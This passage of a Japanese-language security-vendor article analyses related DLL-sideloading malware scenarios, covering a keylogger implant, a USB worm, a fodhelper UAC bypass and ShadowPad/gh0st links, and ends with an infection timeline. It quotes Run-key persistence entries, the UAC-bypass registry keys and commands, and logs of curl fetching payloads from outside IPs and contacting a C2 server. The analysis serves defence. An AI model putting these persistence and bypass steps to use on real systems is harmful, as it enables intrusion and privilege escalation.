<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image9.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87835" src="https://news.sophos.com/wp-content/uploads/2022/11/image9.png" alt="Hex dump of a config, showing an IP address" width="640" height="375" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image9.png 1150w, https://news.sophos.com/wp-content/uploads/2022/11/image9.png?resize=300,176 300w, https://news.sophos.com/wp-content/uploads/2022/11/image9.png?resize=768,450 768w, https://news.sophos.com/wp-content/uploads/2022/11/image9.png?resize=1024,600 1024w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 9: メモリダンプで撮影されたスクリーンショット</em></p>
<h4>main.plg</h4>
<p>コンパイル日時: 2021 年 8 月 19 日 21:04:16</p>
<p>インストール時に、このインプラントは dllhost.exe 内に隠蔽されます。main.plg には <a href="https://github.com/m0n0ph1/malware-1/blob/master/Trochilus/bin/Bin/vtcp.dll">Trochilus RAT collection</a> マルウェア由来の vtcp.dll が埋め込まれています。</p>
<p>vtcp.dll はメモリにロードされます。この dll のエクスポートが後の通信に使用されます。</p>
<p>vtcp.dll は CNetDiskClientSocket の vftable 関数を通信に使用します。main.plg は local.plg を読み込み、復号化します。main.plg は予めハードコードされた構成情報を持ち、デコードされた内容で上書きされます。ハードコードされた構成情報は、テスト時や local.plg ファイルが見つからない場合に使用される場合があります。ハードコードされた構成情報の中身は以下の通りです。</p>
<pre>cfg_find_tag
mark
192.168.211.1
192.168.211.1</pre>
<p>main.plg は「MSN Shessll – %d」クラスとして登録されます。%d に入る数字は、Windows API 関数 GetTickCount の呼び出しによって生成されます。次に、キー入力のログをファイルに記録します。  main.plg は C:\\ProgramData\\Netsky と C:\Users\All Users.の両方に dir.dat を作成します。いずれのファイルにも、サイドローディングコンポーネントがインストールされたディレクトリの名前、ここでは C:\ProgramData\Netsky が含まれています。</p>
<p>このプロセスでは、図 10 に示すように、実行中にデバッグログが生成されます。</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image10.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87836" src="https://news.sophos.com/wp-content/uploads/2022/11/image10.png" alt="Screenshot showing events being logged" width="446" height="215" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image10.png 446w, https://news.sophos.com/wp-content/uploads/2022/11/image10.png?resize=300,145 300w" sizes="(max-width: 446px) 100vw, 446px" /></a></p>
<p><em>図 10: プロセスで生成されるログ</em></p>
<h3>事例 4: シナリオ D、USB ディスクの乗っ取り</h3>
<p>ファイル内の内部開発情報によると、このシナリオは「U ディスクの乗っ取り」と呼ばれているようです。</p>
<h4>サイドローダー DLL</h4>
<h4><em>u2ec.dll</em></h4>
<pre>作成日時   2021 年 9 月 1 日 09:23:30 UTC
初投稿　 2022 年 1 月 2 日 04:07:47 UTC</pre>
<p>以下の PDB パスが含まれています。</p>
<p>G:\project\APT\U盘劫持\new\u2ec\Release\u2ec.pdb</p>
<p>(U盘劫持: 中国語で「U ディスクの乗っ取り」)</p>
<p>VirusTotal でこのファイルの変種を確認しました。違いは、一部データが追加されていることだけです。</p>
<pre>MD5 230c9a22104d5363d2e2738a6ac62b80
SHA-1   a693a273a23ec3ad274469492dc8db9f85f31c8f
SHA-256 a519c4e5dadd68c2301e65689857907941af23565bc19bb938fd3c51ff5f34ca</pre>
<h4><em>インプラント</em></h4>
<p>このシナリオのインプラントは、暗号化された状態で保存されており、ローダーシェルコードによってデコードされます。これらのインプラントは、エクスポートのない DLL ファイルであり、メインコードはエントリコードです。</p>
<h4>usb.ini</h4>
<p>興味深いことに、このアーティファクトは C2 通信を一切行っていないようです。</p>
<p>PDB ファイル名: G:\project\APT\U盘劫持\new\shellcode\Release\shellcode.pdb</p>
<p>(U盘劫持: 中国語で「U ディスクの乗っ取り」)</p>
<p>アイコンと実行ファイルはリムーバブルドライブのアイコンを模しており、標的を騙してクリックさせるようになっています。ディレクトリ一覧は、以下の図 11 のように表示されます。</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image11.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87837" src="https://news.sophos.com/wp-content/uploads/2022/11/image11.png" alt="Screenshot of a directory listing, showing a spoofed removable USB" width="316" height="398" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image11.png 316w, https://news.sophos.com/wp-content/uploads/2022/11/image11.png?resize=238,300 238w" sizes="(max-width: 316px) 100vw, 316px" /></a></p>
<p><em>図 11: 偽装されたアイコン</em></p>
<p>その後、警告が表示されます。</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image12.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87838" src="https://news.sophos.com/wp-content/uploads/2022/11/image12.png" alt="Screenshot of a Windows security warning" width="616" height="444" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image12.png 616w, https://news.sophos.com/wp-content/uploads/2022/11/image12.png?resize=300,216 300w" sizes="(max-width: 616px) 100vw, 616px" /></a></p>
<p><em>図 12: ファイルを実行しようとすると Windows は警告を表示しますが、ユーザーには一見信頼できそうな情報が表示される</em></p>
<p>しかし、実行ファイルは (見かけ上) 正規のものであり、署名付きであるため、標的は怪しみません。</p>
<p>「programdata」を含むパスから実行されているのでない限り、usb.ini はコンピューターに感染し、以下のような手順でファイルを作成/コピーします。</p>
<p>udisk というインストールディレクトリを作成し、その中にドキュメントやイメージファイルをコピーした後、カレントディレクトリ (GetModuleFileName) からすべてのファイルを c:\programdata\udisk にコピーします。</p>
<p>ファイルのコピーを終えると、レジストリに以下のような自動実行キーを作成します。</p>
<pre>HKCU\Software\Microsoft\Windows\CurrentVersion\Run   udisk

c:\programdata\udisk\disk_watch.exe</pre>
<p>その後、以下の場所に自身をコピーし、そのコピーを実行します。</p>
<pre>c:\\programdata\\udisk\\disk_watch.exe
c:\\programdata\\udisk\\DateCheck.exe</pre>
<p>disk_watch.exe として実行されている場合、usb.ini は USB ディスクに自身を複製することで感染します。</p>
<p>ログから確認できる、感染過程は以下の通りです。</p>
<p>はじめに、u2ec.dll がペイロードを読み込みます。</p>
<pre>2022-05-02T03:26:54.419932Z   [ e:\usb drive.exe::13956 ]     === 
FileRead ===&gt;   [ e:\u2ec.dll ]
2022-05-02T03:26:55.212781Z   [ e:\usb drive.exe::13956 ]     === 
FileRead ===&gt;   [ e:\autorun.inf\protection for autorun\system 
volume information\usb.ini ]</pre>
<p>次に、ファイル (ワームそのものではなく、ユーザーが root に作成したドキュメント) が、ワームのインスタンスと他のサイドロードシナリオのコンポーネントと同様に、インストールディレクトリにコピーされます。その後、自動実行レジストリキーが作成されます。</p>
<pre>2022-05-02T03:27:46.035555Z   [ e:\usb drive.exe::13956 ]     === 
RegKeySetValue ===&gt;   [ HKEY_USERS\S-1-5-21-2519359479-851945054-
3016455893-1321\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ]
2022-05-02T03:27:46.198285Z   [ e:\usb drive.exe::13956 ]     === 
RegKeySetValue ===&gt;   [ 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Notifications\Data ]</pre>
<h3>事例 5: シナリオ E、Win10 UAC バイパス</h3>
<p>使用されるコンポーネントは以下の通りです。</p>
<pre>c:\users\public\libraries\out\symstore.exe : 
83e51f9d467977238f9fa5107106918ed5102f1a3e06eeba9a33d21d5df49d6a
c:\users\public\libraries\out\symsrv.dll : 
9c2f1eeea169f2dd196bc9a0d240d941ccb5a22a050bca856c1a03fd795ac58d
c:\users\public\libraries\out\msvcrt.dll : 
d8cf89e651a2e1d9f8f653d16ecbca979d6c9459329a015ff825eff38792ed24</pre>
<p>この事例では、暗号化された追加のペイロードファイルはありません。サイドロードされた DLL である symsrv.dll がそのままペイロードとなります。</p>
<h4>SYMSRV.dll</h4>
<p>PDB パス:</p>
<p><em>C:\Users\admin\Desktop\djwklqjdlwqjldwqjlkfjwlqkjlqwjglqwjglqjlgjwqkjgk\SYMSRV.pdb</em></p>
<p><a href="https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/">PenTestLab のブログ (こちら)</a> で説明されているように、SYMSRV.dll は正体不明の 3.exe コンポーネントを含むコマンドを実行するために UAC バイパス手法を使用する 64 ビットローダー DLL です。</p>
<p>インプラントはさまざまなコマンドを実行し、レジストリキー <em>HKCU\ Classes\ms-settings\CurVer</em> に挿入されます。UAC バイパス手法に対して脆弱な 2 種類の Windows コンポーネントの実行を試みます。</p>
<pre>c:\windows\system32\fodhelper.exe
c:\windows\system32\ComputerDefaults.exe</pre>
<p>これらの正規の Windows コンポーネントは実行されると、レジストリキーから実行するコマンドを受け取り、より高い権限で実行します。</p>
<p>この方法で、以下のコマンドが実行されているのを確認しました。</p>
<pre>C:\\users\\public\\libraries\\3.exe
mkdir C:\\programdata\\googleupdate\
C:\\Users\\Public\\Libraries\\out\\googleupdate.exe</pre>
<p>そのため、インプラントはレジストリにフラグを作成し、他の実行ファイルの介入を防ぎます。フラグが設定されている場合は、他のコマンドが実行中であることを示します。フラグキーは <em>HKCU\Classes\aaabbb32\shell\open\command</em> です。</p>
<p>攻撃者は、DLL をサイドロードする手法に強いこだわりを持っています。この UAC バイパス手法は、どのインプラントにもコンパイルできたはずです。しかし、その代わりに、シンプルなロジックがスタンドアロンのサイドロードシナリオとして実行されており、デバッグ機能によってペイロードが巨大 (1.1MB) な DLL ファイルへと膨れ上がっています。</p>
<h3>シナリオ F: ShadowPad への接続</h3>
<p>前述の通り、ソフォス以外のソースから追加の事例を VirusTotal で発見しました。この事例は VT ハンティングで発見されたもので、2021 年 1 月のものですが、上述したような 2022 年の事例と共通する特徴を持っており、明らかに関連しています。</p>
<h4>サイドローダー DLL</h4>
<p>以下のファイルが確認されました。</p>
<pre>73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6: log.dll
MD5        63971f35a4282343eced55ebdfd1cb0b
SHA-1    bee88779a9c65543a9cfa5069b4486131a23e55d
SHA-256 73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6
Creation Time 2021-01-25 05:43:52 UTC
Signature Date             05:48 AM 01/25/2021
First Submission         2022-01-26 05:43:49 UTC</pre>
<p>Bitdefender 由来のデジタル署名での自己署名を装っていますが、実際には偽装されたものです。</p>
<pre>BitDefender SRL
Name      BitDefender SRL
Status This certificate or one of the certificates in the certificate chain is not 
time valid. The certificate or certificate chain is based on an untrusted root.
Issuer BitDefender SRL
Valid From       05:48 AM 01/25/2021
Valid To            05:48 AM 01/25/2022
Valid Usage     All
Algorithm         sha256RSA
Thumbprint       A9CA14BA90962DEA552F6A5FB2E5970ACF939EDE
Serial Number 01</pre>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image13.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87839" src="https://news.sophos.com/wp-content/uploads/2022/11/image13.png" alt="Screenshot of a digital certificate's signing details" width="640" height="477" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image13.png 702w, https://news.sophos.com/wp-content/uploads/2022/11/image13.png?resize=300,224 300w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 13: 疑わしいデジタル署名</em></p>
<p>サイドローダー DLL は、qutmain.dat というファイルからペイロードを読み込みます。</p>
<p>このサイドローディングシナリオは以下のファイルで構成されています。</p>
<pre>73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6 *log.dll
bcc588207d62a44149df54bd948815bdcfe60e7864bae00d6cd619f5d6cc2257 *qutload.dat
7529e60f377b24c60914ec909dbfdc0e60ad9e18fbf9750a4463acf33a7ce16f *qutmain.dat
386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd *qutppy.exe
fb65524f27e847ac073a61d2c3eeae6a9447e34836347bbd7baff22a07cf0b01 *vsserver.dat</pre>
<p>上記の .dat ファイルは暗号化されたプラグインであり、quttpy.exe は Bitdefender の正規ローダー (Bitdefender Crash Handler) です。この正規ファイルのサイドロードシナリオでの使用は (ペイロードは異なるものの) 2021 年初頭から報告されており、<a href="https://news.sophos.com/ja-jp/2021/03/15/covert-code-faces-a-heap-of-trouble-in-memory-jp/">NetSarang</a> こと ShadowPad に起因するとされています。(さらに、Trend Micro は暗号化された .dat ファイルを Trojan.Win32.SHADOWPAD.CGW.enc として検出します。)実際の設定データを含んだ info.dat というファイルもあるはずですが、復元はできませんでした。</p>
<p>log.dll のローダーには、上記の事例と同様の難読化が施されており、復号化されたプラグインシェルには同じシェルコードのローダーが使用されていました。2022 年の攻撃との強い関連性を示していると考えられます。</p>
<h4>インプラント</h4>
<h4>qutmain.dat</h4>
<p>このファイルは本質的には alloc.plg と同一です。インストールされたプラグインが格納された以下の場所を参照します。</p>
<pre>C:\ProgramData\mos\qutppy.exe
C:\ProgramData\mos\qutload.dat
C:\ProgramData\mos\qutppy.exe online
C:\ProgramData\mos\info.dat
C:\ProgramData\mos\vsserver.dat
C:\ProgramData\mos\qutppy.exe install</pre>
<p>また、alloc.plg と同様、<em>[fortest]</em> タグを使用したデバッグメッセージを生成する上に、alloc.plg と全く同じ UAC バイパスコンポーネントを含んでいます。</p>
<h4>qutload.dat</h4>
<p>このファイルは、free.plg と同一です。シナリオの違いに合わせてファイルパスが変更されているだけです。</p>
<h4>vssserver.dat</h4>
<p>このファイルは main.plg と同一です。同一の、ハードコードされたデフォルトの構成設定値が含まれています。</p>
<pre>cfg_find_tag
mark
192.168.211.1
192.168.211.1</pre>
<h4>info.dat</h4>
<p>このファイルは暗号化された構成ファイルです。復元はできていません。</p>
<h3>シナリオ G: 攻撃のプロトタイプ</h3>
<p>このシナリオは非常に初期の (2017 年です!) 事例で、最近の事例と同様に難読化され、同様のハードコードされたデフォルト構成設定を用いています。このシナリオは VT ハンティングで発見されました。</p>
<p>ファイル情報:</p>
<pre>MD5        413bb0864c3933009a9cc486f07070e4
SHA-1    f5895c69c995ac8b7f01ff85df9777595fe8b35d
SHA-256 b2a332fb6e896a896f72e6bbbf6351d756f1ab6a57fbe662050ed1c18cad3e4b
Creation Time 2017-03-23 12:20:10 UTC
First Submission         2017-05-14 05:16:34 UTC</pre>
<p>以下の実行ファイルが内蔵されています。</p>
<pre>389058c291b536eb65ba3a65e2024eb6350ff1a5ed48c036692bf5fed4729970</pre>
<p>内蔵の実行ファイルの特徴的な文字列:</p>
<pre>hTTP/1.1 403 fORBIDDENRNRN&lt;h1&gt;403 fORBIDDEN&lt;/h1&gt;
HtTp/1.0 200 OKRNRN
192.168.1.2</pre>
<p>また、同様の構成データが格納されていますが、先頭のデータは異なります。</p>
<pre>mmconfig-tag
192.168.1.33
KarSpy
KarSpy
Kar security services</pre>
<p>コードから以下のサイドロードコンポーネントが特定されました。</p>
<pre>%CommonProgramFiles%\Sandboxie\SbieDll.dll
%CommonProgramFiles%\Sandboxie\Sandboxie.exe
%CommonProgramFiles%\Sandboxie</pre>
<p>悪意のある DLL は gh0st RAT の一種です。ペイロードの詳細は、現時点では不明です。</p>
<h2>付録: 「ワーム祭り」の分析</h2>
<p>テレメトリの観測結果から、感染プロセスを再構築しました。ここでは、最も複雑な攻撃である事例 4 (「ワーム祭り」) の感染時系列をご紹介します。この事例では、ペイロードに USB ワームが配信され、他の APT の一部が取り込まれていました。</p>
<p>最初のサイドローディング:</p>
<pre>2022-06-24T03:11:11.519857Z      [ 
c:\users\public\libraries\ciscocollabhost.exe::38752 ]    === FileRead ===&gt;
     [ c:\users\public\libraries\ciscosparklauncher.dll ]
2022-06-24T03:11:11.519857Z      [ 
c:\users\public\libraries\ciscocollabhost.exe::38752 ]    === FileRead ===&gt;
     [ c:\users\public\2831329086.inf ]
Downloading the RAR archive
2022-06-24T04:02:58.673626Z      [ c:\windows\syswow64\curl.exe::36336 ]
    === IpConnector ===&gt;   [ 103.253.72.116 ]
2022-06-24T04:02:58.793284Z      [ c:\windows\syswow64\curl.exe::36336 ]    
=== FileWrite ===&gt;       [ c:\users\public\libraries\out\v1.rar ]</pre>
<p>2 度目のサイドローディング:</p>
<pre>2022-06-24T04:03:54.211485Z      [ c:\program files\winrar\rar.exe::39988 ]     
=== FileWrite ===&gt;    [ c:\users\public\libraries\out\symsrv.dll ]
2022-06-24T04:03:54.243728Z      [ c:\program files\winrar\rar.exe::39988 ]     
=== FileWrite ===&gt;    [ c:\users\public\libraries\out\symstore.exe ]
2022-06-24T04:03:54.249938Z      [ c:\program files\winrar\rar.exe::39988 ]     
=== FileWrite ===&gt;    [ c:\users\public\libraries\out\msvcrt.dll ]
2022-06-24T04:03:54.263187Z      [ c:\program files\winrar\rar.exe::39988 ]     
=== FileRead ===&gt;    [ c:\users\public\libraries\out\v1.rar ]</pre>
<p>上記のスクリーンショットは、2 度目のサイドローディング攻撃が実行される様子を示しており、カスタムファイル拡張子と、その拡張子のファイルを開くカスタムコマンドを登録するためのレジストリキーが作成されています。<a href="https://news.sophos.com/ja-jp/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence-jp/">SolarMarker と同様</a>、常駐化のための手法だと考えられます。</p>
<pre>2022-06-24T04:05:43.119771Z      [ 
c:\users\public\libraries\out\symstore.exe::39668 ]    === FileRead ===&gt;
     [ c:\users\public\libraries\out\symsrv.dll ]
2022-06-24T04:05:43.159707Z      [ 
c:\users\public\libraries\out\symstore.exe::39668 ]    === RegKeyCreate ===&gt;
     [ HKEY_USERS\S-1-5-21-1497078658-3044148255-4064547459-
1001_<strong>Classes\aaabbb32\shell\open\command</strong> ]
2022-06-24T04:05:43.160709Z      [ 
c:\users\public\libraries\out\symstore.exe::39668 ]    === RegKeySetValue 
===&gt;       [ HKEY_USERS\S-1-5-21-1497078658-3044148255-4064547459-
1001_Classes\aaabbb32\shell\open\command ]
2022-06-24T04:05:43.161131Z      [ 
c:\users\public\libraries\out\symstore.exe::39668 ]    === RegKeyCreate ===&gt; 
       [ <strong>HKEY_USERS\S-1-5-21-1497078658-3044148255-4064547459-1001_Classes\ms-</strong>
<strong>settings\CurVer</strong> ]
2022-06-24T04:05:43.162128Z      [ 
c:\users\public\libraries\out\symstore.exe::39668 ]    === RegKeySetValue 
===&gt;       [ HKEY_USERS\S-1-5-21-1497078658-3044148255-4064547459-
1001_Classes\ms-settings\CurVer ]</pre>
<p>さらに別の 3.exe が作成されます (symstore.exe -&gt; fodhelper.exe -&gt; 3.exe)。</p>
<pre>2022-06-24T04:05:43.318703Z      [ 
c:\users\public\libraries\out\symstore.exe::39668 ]    === FileRead ===&gt;
     [ c:\windows\system32\fodhelper.exe ]
2022-06-24T04:05:44.215109Z      [ c:\windows\system32\fodhelper.exe::26224 ]
      === FileRead ===&gt;     [ c:\users\public\libraries\3.exe ]          
2022-06-24T04:05:44.240169Z      [ c:\users\public\libraries\3.exe::42928 ] 
      === FileRead ===&gt;       [ c:\windows\syswow64\hmpalert.dll ]
2022-06-24T04:05:44.242168Z      [ c:\users\public\libraries\3.exe::42928 ] 
      === FileRead ===&gt;       [ c:\windows\system32\conhost.exe ]</pre>
<p>Fodhelper.exe は 3.exe を実行します。ただし、その前にレジストリキー HKEY_USERS\S-1-5-21-1497078658-3044148255-4064547459-1001_Classes\ms-settings\CurVer が作成されます。この手法は、2017 年に <a href="https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/">Pentestlab が紹介</a>し、<a href="https://threatpost.com/trickbot-switches-to-a-new-windows-10-uac-bypass-to-evade-detection/152477/">最近では Trickbot が使用</a>したものと同様の UAC バイパス手法だと考えられます。</p>
<p>その後、攻撃者は 3.exe を実行し、サイドローディングシナリオのコンポーネントを削除しました。nvsmartmax.dll と nvsmartmax.dat を混同しないようにご注意ください。Cybereason は以前、中国の APT グループによって攻撃に使用されるのが<a href="https://www.cybereason.com/blog/research/deadringer-exposing-chinese-threat-actors-targeting-major-telcos">報告されています</a>。</p>
<pre>2022-06-24T04:05:44.568617Z      [ c:\users\public\libraries\3.exe::42928 ]
      === FileDelete ===&gt;    [ c:\programdata\googleupdate\googleupdate.exe ]
2022-06-24T04:05:44.570493Z      [ c:\users\public\libraries\3.exe::42928 ] 
      === FileDelete ===&gt;    [ c:\programdata\googleupdate\goopdate.ja ]
2022-06-24T04:05:44.571488Z      [ c:\users\public\libraries\3.exe::42928 ] 
      === FileDelete ===&gt;    [ c:\programdata\googleupdate\libvlc.dll ]
2022-06-24T04:05:44.573479Z      [ c:\users\public\libraries\3.exe::42928 ]
      === FileDelete ===&gt;    [ c:\programdata\googleupdate\loader.ja ]
2022-06-24T04:05:44.574480Z      [ c:\users\public\libraries\3.exe::42928 ] 
      === FileDelete ===&gt;    [ c:\programdata\googleupdate\nvsmartmax.dat ]
2022-06-24T04:05:44.576644Z      [ c:\users\public\libraries\3.exe::42928 ] 
      === FileDelete ===&gt;    [ c:\programdata\googleupdate\nvsmartmax.dll ]
2022-06-24T04:05:44.577473Z      [ c:\users\public\libraries\3.exe::42928 ] 
      === FileDelete ===&gt;    [ c:\programdata\googleupdate\time.sig ]
2022-06-24T04:05:44.580460Z      [ c:\users\public\libraries\3.exe::42928 ] 
      === RegKeySetValue ===&gt;       [ 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\bam\State\UserSettings\S-
1-5-21-1497078658-3044148255-4064547459-1001 ]</pre>
<p>3 度目のサイドローディングシナリオコンポーネントのダウンロード:</p>
<pre>2022-06-24T04:08:34.208478Z      [ 
c:\users\public\libraries\ciscocollabhost.exe::38752 ]    === FileRead ===&gt;
     [ c:\windows\syswow64\cmd.exe ]
2022-06-24T04:08:34.348517Z      [ c:\windows\syswow64\cmd.exe::38472 ]
     === FileRead ===&gt;       [ c:\windows\syswow64\curl.exe ]
2022-06-24T04:08:34.732663Z      [ c:\windows\syswow64\<strong>curl.exe</strong>::41216 ]
    === IpConnector ===&gt;   [ 5.252.178.162 ]
2022-06-24T04:08:35.412783Z      [ c:\windows\syswow64\curl.exe::41216 ]
    === FileWrite ===&gt;       [ c:\users\public\libraries\out\c.rar ]</pre>
<p>ダウンロードした RAR アーカイブの中身:</p>
<pre>2022-06-24T04:10:14.279520Z      [ c:\program files\winrar\rar.exe::40260 ]
     === FileWrite ===&gt;    [ c:\users\public\libraries\out\goopdate.ja ]
2022-06-24T04:10:14.299137Z      [ c:\program files\winrar\rar.exe::40260 ]
     === FileWrite ===&gt;    [ c:\users\public\libraries\out\<strong>libvlc.dll</strong> ]
2022-06-24T04:10:14.301128Z      [ c:\program files\winrar\rar.exe::40260 ]
     === FileWrite ===&gt;    [ c:\users\public\libraries\out\<strong>loader.ja</strong> ]
2022-06-24T04:10:14.307180Z      [ c:\program files\winrar\rar.exe::40260 ]
     === FileWrite ===&gt;    [ c:\users\public\libraries\out\time.sig ]
2022-06-24T04:10:14.310114Z      [ c:\program files\winrar\rar.exe::40260 ]
     === FileWrite ===&gt;    [ c:\users\public\libraries\out\googleupdate.exe ]
2022-06-24T04:10:14.322856Z      [ c:\program files\winrar\rar.exe::40260 ]
     === FileWrite ===&gt;    [ c:\users\public\libraries\out\googleupdate.exe ]
2022-06-24T04:10:14.322856Z      [ c:\program files\winrar\rar.exe::40260 ]
     === FileRead ===&gt;    [ c:\users\public\libraries\out\c.rar ]</pre>
<p>3 度目のサイドローディングシナリオの実行:</p>
<pre>2022-06-24T04:11:16.921480Z      [ 
c:\users\public\libraries\out\googleupdate.exe::41944 ]   === FileRead ===&gt;
     [ c:\users\public\libraries\out\libvlc.dll ]
2022-06-24T04:11:16.962673Z      [ 
c:\users\public\libraries\out\googleupdate.exe::41944 ]   === FileRead ===&gt;
     [ c:\users\public\libraries\out\loader.ja ]</pre>
<p>サーバーへの接続:</p>
<pre>2022-06-24T04:18:11.335261Z      [ 
c:\users\public\libraries\ciscocollabhost.exe::38752 ]    === IpConnector ===&gt;
     [ 91.245.253[.]52 ]</pre>
<p>攻撃者は、いくつかの異なるコマンドライン引数を使用して symstore.exe を実行しました。</p>
<pre>         "commandLine" : 
"C:\\Users\\Public\\Libraries\\out\\symstore.exe  
C:\\Users\\Public\\Libraries\\out\\googleupdate.exe",
         "commandLine" : 
"C:\\Users\\Public\\Libraries\\out\\symstore.exe  
C:\\users\\public\\libraries\\3.exe",
         "commandLine" : 
"C:\\Users\\Public\\Libraries\\out\\symstore.exe  \"mkdir 
C:\\programdata\\googleupdate\"",</pre>
<p>サイドロードされた DLL コンポーネント (symsrv.dll) がこれらのコマンドラインパラメータを受け取り、fodhelper.exe を用いて UAC をバイパスしながら実行していると考えられます。</p>
<p>これらの攻撃のセキュリティ侵害の痕跡 (IoC) は、<a href="https://github.com/sophoslabs/IoCs">ソフォスの GitHub リポジトリ</a>で公開する予定です。</p>
			</div>
	<div class="mt-12">
		
<ul
	id="social-sharing"
	class="flex justify-center items-center space-x-6"
>
	<li class="facebook">
		<a
			class="js-share-modal"
			href="http://www.facebook.com/share.php?u=https://news.sophos.com/?p=88054&#038;title=DLL%20サイドローディングを用いた%205%20件の攻撃の共通点とは"
			data-title="DLL サイドローディングを用いた 5 件の攻撃の共通点とは"
			title="Facebook でシェア">
				<span class="sr-only">Facebook でシェア</span>
				<svg
					width="8"
					height="16"
					xmlns="http://www.w3.org/2000/svg"
					class="text-sophos-gray-600 hover:text-black"
					fill="currentColor"
				>
					<path d="M7.145 8.006H4.903V16H1.581V8.006H0V5.182h1.581V3.354C1.581 2.045 2.202 0 4.933 0l2.461.01v2.742H5.608c-.291 0-.705.145-.705.77v1.66h2.533l-.291 2.824z" fill-rule="nonzero"/>
				</svg>
		</a>
	</li>
	<li class="twitter">
		<a
			class="js-share-modal"
			href="http://twitter.com/intent/tweet?text=DLL%20%E3%82%B5%E3%82%A4%E3%83%89%E3%83%AD%E3%83%BC%E3%83%87%E3%82%A3%E3%83%B3%E3%82%B0%E3%82%92%E7%94%A8%E3%81%84%E3%81%9F%205%20%E4%BB%B6%E3%81%AE%E6%94%BB%E6%92%83%E3%81%AE%E5%85%B1%E9%80%9A%E7%82%B9%E3%81%A8%E3%81%AF%20https%3A%2F%2Fnews.sophos.com%2F%3Fp%3D88054"
			data-title=""
			title="Twitter でシェア">
				<span class="sr-only">Twitter でシェア</span>
				<svg
					width="14"
					height="13"
					xmlns="http://www.w3.org/2000/svg"
					class="text-sophos-gray-600 hover:text-black"
					fill="currentColor"
				>
					<path d="M12.567 3.238c.007.141.01.281.01.424 0 4.338-2.89 9.34-8.173 9.34-1.623 0-3.132-.543-4.403-1.475.225.03.453.045.685.045 1.346 0 2.584-.523 3.566-1.404-1.255-.028-2.317-.977-2.682-2.28a2.56 2.56 0 001.296-.056C1.554 7.53.562 6.203.562 4.613v-.04c.389.245.83.392 1.302.41C1.094 4.393.587 3.387.587 2.25c0-.602.142-1.166.388-1.65 1.416 1.986 3.534 3.292 5.92 3.43a3.735 3.735 0 01-.074-.749c0-1.813 1.286-3.28 2.873-3.28.825 0 1.572.397 2.096 1.034a5.324 5.324 0 001.824-.797c-.215.768-.67 1.41-1.263 1.816a5.178 5.178 0 001.65-.515 6.362 6.362 0 01-1.434 1.7" fill-rule="nonzero"/>
				</svg>
		</a>
	</li>
	<li class="linkedin">
		<a
			href="http://www.linkedin.com/shareArticle?mini=true&url=https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/"
			data-title="DLL サイドローディングを用いた 5 件の攻撃の共通点とは"
			title="LinkedIn でシェア"
			onclick="window.open(this.href, '', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;">
			<span class="sr-only">LinkedIn でシェア</span>
			<svg
				width="16"
				height="16"
				xmlns="http://www.w3.org/2000/svg"
				class="text-sophos-gray-600 hover:text-black"
				fill="currentColor"
			>
				<path d="M16 15.293h-3.43v-5.52c0-1.386-.496-2.334-1.738-2.334-.946 0-1.512.64-1.76 1.256-.09.22-.113.526-.113.836v5.762H5.53s.044-9.35 0-10.316h3.43v1.46c.456-.705 1.27-1.703 3.091-1.703 2.256 0 3.95 1.473 3.95 4.643v5.916zM1.917 3.566h-.022C.745 3.566 0 2.773 0 1.783 0 .772.768 0 1.94 0c1.173 0 1.896.772 1.917 1.783 0 .99-.744 1.783-1.94 1.783zM.202 15.293h3.431V4.977H.203v10.316z" fill-rule="nonzero"/>
			</svg>
		</a>
	</li>
	<li class="comments">
		<a
			href="#comments"
			title="コメントを残す"
			class="flex items-center space-x-1"
		>
			<svg
				width="16"
				height="16"
				xmlns="http://www.w3.org/2000/svg"
				class="text-sophos-gray-600 hover:text-black"
				fill="currentColor"
			>
				<path d="M8.5 0a7.5 7.5 0 11-3.916 13.898C3.317 15.273 1.773 15.36.256 15.135c1.011-1.185 1.678-2.357 2-3.517l-.007.027A7.5 7.5 0 018.5 0z" fill-rule="evenodd"/>
			</svg>
					</a>
	</li>
</ul>

			</div><!-- .entry-social -->
	</div>

</article><!-- #post-## -->

			<div class="container my-8 md:my-16">
				<div class="max-w-4xl mx-auto">
					<div class="article-author-block article-co-authors-block">
	
					<div class="author-block">
				<div class="author-block__profile">
					<img alt='' src='https://secure.gravatar.com/avatar/040a829707237b26ea3984dfc4621217?s=400&#038;d=blank&#038;r=g' class='avatar avatar-400 photo' height='400' width='400' />				</div> <!-- .author-profile -->

				<div class="author-block__wrapper">
					<div class="author-block__content">

													<div class="author-block__about">
								著者について							</div>
						
						<h3 class="author-block__name">
						<a href="https://news.sophos.com/ja-jp/author/gabor-szappanos/" title="Posts by Gabor Szappanos" class="author url fn" rel="author">Gabor Szappanos</a>						</h3>

						
							<div class="author-block__bio">
